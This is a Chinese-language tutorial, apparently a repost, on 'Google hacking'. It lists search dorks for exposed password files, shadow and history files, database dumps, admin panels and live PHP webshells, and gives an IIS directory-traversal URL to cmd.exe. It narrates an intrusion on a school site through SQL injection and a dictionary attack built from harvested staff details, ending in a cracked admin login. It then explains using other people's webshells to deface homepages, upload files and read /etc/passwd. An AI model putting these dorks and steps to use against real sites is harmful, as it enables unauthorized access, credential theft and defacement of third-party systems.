明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

Google黑客應(yīng)用技巧總結(jié)

[摘要]google hacking其實(shí)并算不上什么新東西,當(dāng)時(shí)并沒有重視這種技術(shù),認(rèn)為webshell什么的,并無(wú)太大實(shí)際用途.google hacking其實(shí)并非如此簡(jiǎn)單... 常用的google關(guān)...

google hacking其實(shí)并算不上什么新東西,當(dāng)時(shí)并沒有重視這種技術(shù),認(rèn)為webshell什么的,并無(wú)太大實(shí)際用途.google hacking其實(shí)并非如此簡(jiǎn)單...

常用的google關(guān)鍵字:

foo1 foo2 (也就是關(guān)聯(lián), 比如搜索xx公司 xx美女)

operator:foo

filetype:123 類型

site:foo.com 相對(duì)直接看網(wǎng)站更有意思, 可以得到許多意外的信息

intext:foo

intitle: fooltitle 標(biāo)題哦

allinurl:foo 搜索xx網(wǎng)站的所有相關(guān)連接。 (踩點(diǎn)必備)

links:foo 不要說(shuō)就知道是它的相關(guān)鏈接

allintilte:foo.com

我們可以輔助"-" "+"來(lái)調(diào)整搜索的精確程度

直接搜索密碼:(引號(hào)表示為精確搜索)

當(dāng)然我們可以再延伸到上面的結(jié)果里進(jìn)行二次搜索

"index of" htpasswd / passwd

filetype:xls username password email

"ws_ftp.log"

"config.php"

allinurl:admin mdb

service filetype:pwd ....或者某個(gè)比如pcanywhere的密碼后綴cif等

越來(lái)越有意思了, 再來(lái)點(diǎn)更敏感信息

"robots.txt" "Disallow:" filetype:txt

inurl:_vti_cnf (FrontPage的關(guān)鍵索引啦, 掃描器的CGI庫(kù)一般都有地)

allinurl: /msadc/Samples/selector/showcode.asp

/../../../passwd

/examples/jsp/snp/snoop.jsp

phpsysinfo

intitle:index of /admin

intitle:"documetation"

inurl: 5800(vnc的端口)或者desktop port等多個(gè)關(guān)鍵字檢索

webmin port 10000

inurl:/admin/login.asp

intext:Powered by GBook365

intitle:"php shell*" "Enable stderr" filetype:php 直接搜索到phpwebshell

foo.org filetype:inc

ipsec filetype:conf

intilte:"error occurred" ODBC request where (select insert) 說(shuō)白了就是說(shuō), 可以直接試著查查數(shù)據(jù)庫(kù)檢索, 針對(duì)目前流行的sql注射, 會(huì)發(fā)達(dá)哦

"Dumping data for table" username password

intitle:"Error using Hypernews"

"Server Software"

intitle:"HTTP_USER_AGENT=Googlebot"

"HTTP_USER_ANGET=Googlebot" THS ADMIN

filetype:.doc site:.mil classified 直接搜索軍方相關(guān)word

檢查多個(gè)關(guān)鍵字:

intitle:config confixx login password

"mydomain.com" nessus report

"report generated by"

"ipconfig"

"winipconfig"

google緩存利用(hoho, 最有影響力的東西)推薦大家搜索時(shí)候多"選搜索所有網(wǎng)站"

特別推薦:administrator users 等相關(guān)的東西, 比如名字, 生日等……最慘也可以拿來(lái)做字典嘛

……

一些技巧集合:

1) index.of.password

1) filetype:blt "buddylist"

2) "access denied for user" "using password"

2) intitle:"index of" inurl:ftp (pub incoming)

3) "http://*:*@www" domainname

3) filetype:cnf inurl:_vti_pvt access.cnf

4) auth_user_file.txt

4) allinurl:"/*/_vti_pvt/" allinurl:"/*/_vti_cnf/"

5) The Master List

5) inurl:"install/install.php"

6) allinurl: admin mdb

6) intitle:"welcome.to.squeezebox"

7) passlist.txt (a better way)

7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"

8) "A syntax error has occurred" filetype:ihtml

8) intitle:Login intext:"RT is ? Copyright"

9) "# -FrontPage-" inurl:service.pwd

9) ext:php program_listing intitle:MythWeb.Program.Listing

10) ORA-00921: unexpected end of SQL command

10) intitle:index.of abyss.conf

NO2:

--------------------------------------------------------------------------------

google hacking的簡(jiǎn)單實(shí)現(xiàn)

使用google中的一些語(yǔ)法可以提供給我們更多的信息(當(dāng)然也提供給那些習(xí)慣攻擊的人更多他們所想要的.),下面就來(lái)介紹一些常用的語(yǔ)法.

intext:

這個(gè)就是把網(wǎng)頁(yè)中的正文內(nèi)容中的某個(gè)字符做為搜索條件.例如在google里輸入:intext:動(dòng)網(wǎng).將返回所有在網(wǎng)頁(yè)正文部分包含"動(dòng)網(wǎng)"的網(wǎng)頁(yè).allintext:使用方法和intext類似.

intitle:

和上面那個(gè)intext差不多,搜索網(wǎng)頁(yè)標(biāo)題中是否有我們所要找的字符.例如搜索:intitle:安全天使.將返回所有網(wǎng)頁(yè)標(biāo)題中包含"安全天使"的網(wǎng)

頁(yè).同理allintitle:也同intitle類似.

cache:

搜索google里關(guān)于某些內(nèi)容的緩存,有時(shí)候也許能找到一些好東西哦.

define:

搜索某個(gè)詞語(yǔ)的定義,搜索:define:hacker,將返回關(guān)于hacker的定義.

filetype:

這個(gè)我要重點(diǎn)推薦一下,無(wú)論是撒網(wǎng)式攻擊還是我們后面要說(shuō)的對(duì)特定目標(biāo)進(jìn)行信息收集都需要用到這個(gè).搜索指定類型的文件.例如輸入

:filetype:doc.將返回所有以doc結(jié)尾的文件URL.當(dāng)然如果你找.bak、.mdb或.inc也是可以的,獲得的信息也許會(huì)更豐富:)

info:

查找指定站點(diǎn)的一些基本信息.

inurl:

搜索我們指定的字符是否存在于URL中.例如輸入:inurl:admin,將返回N個(gè)類似于這樣的連接http://www.xxx.com/xxx/admin,用來(lái)找管理員登

陸的URL不錯(cuò).allinurl也同inurl類似,可指定多個(gè)字符.

link:

例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了鏈接的URL.

site:

這個(gè)也很有用,例如:site:www.4ngel.net.將返回所有和4ngel.net這個(gè)站有關(guān)的URL.

對(duì)了還有一些*作符也是很有用的:

+ 把google可能忽略的字列如查詢范圍

- 把某個(gè)字忽略

~ 同意詞

. 單一的通配符

* 通配符, 可代表多個(gè)字母

"" 精確查詢

下面開始說(shuō)說(shuō)實(shí)際應(yīng)用

以下內(nèi)容均在google上搜索,對(duì)于一個(gè)居心叵測(cè)的攻擊者來(lái)說(shuō),可能他最感興趣的就是密碼文件了.而google正因?yàn)槠鋸?qiáng)大的搜索能力往往會(huì)

把一些敏感信息透露給他們.用google搜索以下內(nèi)容:

intitle:"index of" etc

intitle:"Index of" .sh_history

intitle:"Index of" .bash_history

intitle:"index of" passwd

intitle:"index of" people.lst

intitle:"index of" pwd.db

intitle:"index of" etc/shadow

intitle:"index of" spwd

intitle:"index of" master.passwd

intitle:"index of" htpasswd

"# -FrontPage-" inurl:service.pwd

有時(shí)候因?yàn)楦鞣N各樣的原因一些重要的密碼文件被毫無(wú)保護(hù)的暴露在網(wǎng)絡(luò)上,如果被別有用心的人獲得,那么危害是很大的

同樣可以用google來(lái)搜索一些具有漏洞的程序,例如ZeroBoard前段時(shí)間發(fā)現(xiàn)個(gè)文件代碼泄露漏洞,可以用google來(lái)找網(wǎng)上使用這套程序的站點(diǎn):

intext:ZeroBoard filetype:php

或者使用:

inurl:outlogin.php?_zb_path= site:.jp

來(lái)尋找我們所需要的頁(yè)面.phpmyadmin是一套功能強(qiáng)大的數(shù)據(jù)庫(kù)*作軟件,一些站點(diǎn)由于配置失誤,導(dǎo)致我們可以不使用密碼直接對(duì)phpmyadmin進(jìn)行*作.我們可以用google搜索存在這樣漏洞的程序URL:

intitle:phpmyadmin intext:Create new database

還http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dir嗎?用google找找, 你也許還可以找到很多古董級(jí)的機(jī)器。 同樣我們可以用這個(gè)找找有其他cgi漏洞的頁(yè)面。

allinurl:winnt system32

前面已經(jīng)簡(jiǎn)單的說(shuō)過(guò)可以用google來(lái)搜索數(shù)據(jù)庫(kù)文件,用上一些語(yǔ)法來(lái)精確查找能夠獲得更多東西(access的數(shù)據(jù)庫(kù),mssql、mysql的連接文件等等).舉個(gè)例子示例一下:

allinurl:bbs data

filetype:mdb inurl:database

filetype:inc conn

inurl:data filetype:mdb

intitle:"index of" data //在一些配置不正確的apache+win32的服務(wù)器上經(jīng)常出現(xiàn)這種情況,和上面的原理一樣,我們還可以用google來(lái)找后臺(tái).

利用google完全是可以對(duì)一個(gè)站點(diǎn)進(jìn)行信息收集和滲透的, 下面我們用google對(duì)特定站點(diǎn)進(jìn)行一次測(cè)試。

首先用google先看這個(gè)站點(diǎn)的一些基本情況(一些細(xì)節(jié)部分就略去了):

site:xxxx.com

從返回的信息中, 找到幾個(gè)該校的幾個(gè)系院的域名:

http://a1.xxxx.com

http://a2.xxxx.com

http://a3.xxxx.com

http://a4.xxxx.com

順便ping了一下, 應(yīng)該是在不同的服務(wù)器.學(xué)校一般都會(huì)有不少好的資料, 先看看有什么好東西沒

site:xxxx.com filetype:do*

得到*個(gè)不錯(cuò)的*oc。

先找找網(wǎng)站的管理后臺(tái)地址:

site:xxxx.com intext:管理

site:xxxx.com inurl:login

site:xxxx.com intitle:管理

超過(guò)獲得2個(gè)管理后臺(tái)地址:

http://a2.xxxx.com/sys/admin_login.asp

http://a3.xxxx.com:88/_admin/login_in.asp

還算不錯(cuò), 看看服務(wù)器上跑的是什么程序:

site:a2.xxxx.com filetype:asp

site:a2.xxxx.com filetype:php

site:a2.xxxx.com filetype:aspx

site:a3.xxxx.com filetype:asp

site:.......

......

a2服務(wù)器用的應(yīng)該是IIS, 上面用的是asp的整站程序, 還有一個(gè)php的論壇

a3服務(wù)器也是IIS, aspx+asp。 web程序都應(yīng)該是自己開發(fā)的。 有論壇那就看看能不能遇見什么公共的FTP帳號(hào)什么的:

site:a2.xxxx.com intext:ftp://*:*

沒找到什么有價(jià)值的東西。 再看看有沒有上傳一類的漏洞:

site:a2.xxxx.com inurl:file

site:a3.xxxx.com inurl:load

在a2上發(fā)現(xiàn)一個(gè)上傳文件的頁(yè)面:

http://a2.xxxx.com/sys/uploadfile.asp

用IE看了一下, 沒權(quán)限訪問。 試試注射,

site:a2.xxxx.com filetype:asp

得到N個(gè)asp頁(yè)面的地址, 體力活就讓軟件做吧, 這套程序明顯沒有對(duì)注射做什么防范, dbowner權(quán)限, 雖然不高但已足矣, back a shell不太喜

歡, 而且看起來(lái)數(shù)據(jù)庫(kù)的個(gè)頭就不小, 直接把web管理員的密碼暴出來(lái)再說(shuō), MD5加密過(guò)。 一般學(xué)校的站點(diǎn)的密碼都比較有規(guī)律, 通常都是域名+

電話一類的變形, 用google搞定吧。

site:xxxx.com //得到N個(gè)二級(jí)域名

site:xxxx.com intext:*@xxxx.com //得到N個(gè)郵件地址, 還有郵箱的主人的名字什么的

site:xxxx.com intext:電話 //N個(gè)電話

把什么的信息做個(gè)字典吧, 掛上慢慢跑。 過(guò)了一段時(shí)間就跑出4個(gè)帳號(hào), 2個(gè)是學(xué)生會(huì)的, 1個(gè)管理員, 還有一個(gè)可能是老師的帳號(hào)。 登陸上去:

name:網(wǎng)站管理員

pass:a2xxxx7619 //說(shuō)了吧, 就是域名+4個(gè)數(shù)字

要再怎么提權(quán)那就不屬于本文討論訪問了, 呵呵, 到此為止。

這段時(shí)間在國(guó)外的一些google hack的研究站點(diǎn)看了看, 其實(shí)也都差不多是一些基本語(yǔ)法的靈活運(yùn)用, 或者配合某個(gè)腳本漏洞, 主要還是靠

個(gè)人的靈活思維。 國(guó)外對(duì)于google hack方面的防范也并不是很多, 所以大家還是點(diǎn)到為止, 不要去搞破壞拉, 呵呵。 對(duì)于一些在win上跑

apache的網(wǎng)管們應(yīng)該多注意一下這方面, 一個(gè)intitle:index of就差不多都出來(lái)了:)

1.查找利用php webshell

intitle:"php shell*" "Enable stderr" filetype:php

(注: intitle—網(wǎng)頁(yè)標(biāo)題 Enable stderr—UNIX標(biāo)準(zhǔn)輸出和標(biāo)準(zhǔn)錯(cuò)誤的縮寫filetype—文件類型)。 搜索結(jié)果中, 你能找到很多直接在機(jī)器上執(zhí)

行命令的web shell來(lái)。 如果找到的PHPSHELL不會(huì)利用, 如果你不熟悉UNIX, 可以直接看看LIST, 這里就不詳細(xì)說(shuō)了, 有很多利用價(jià)值。 要說(shuō)明

的是, 我們這里搜索出來(lái)的一些國(guó)外的PHPSHELL上都要使用UNIX命令, 都是system調(diào)用出來(lái)的函數(shù)(其實(shí)用百度及其他搜索引擎都可以, 只是填

寫搜索的內(nèi)容不同)。 這個(gè)PHPWEBSHELL是可以直接Echo(Unix常用命令)。 一句話就把首頁(yè)搞定了:

echo "召喚" > index.jsp

現(xiàn)在看看首頁(yè), 已經(jīng)被我們改成: "召喚" 了。

我們也可以用WGET上傳一個(gè)文件上去(比如你要替換的葉子吧)。 然后execute Command輸入 cat file > index.html or echo "" > file

echo "test" >> file

這樣一條條打出來(lái), 站點(diǎn)首頁(yè)就成功被替換了。 同樣的也可以

uname -a;cat /etc/passwd

不過(guò)有點(diǎn)要注意, 有些WEBSHELL程序有問題, 執(zhí)行不了的,

2.搜索INC敏感信息

在google的搜索框中填入:

Code:

.org filetype:inc

 


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。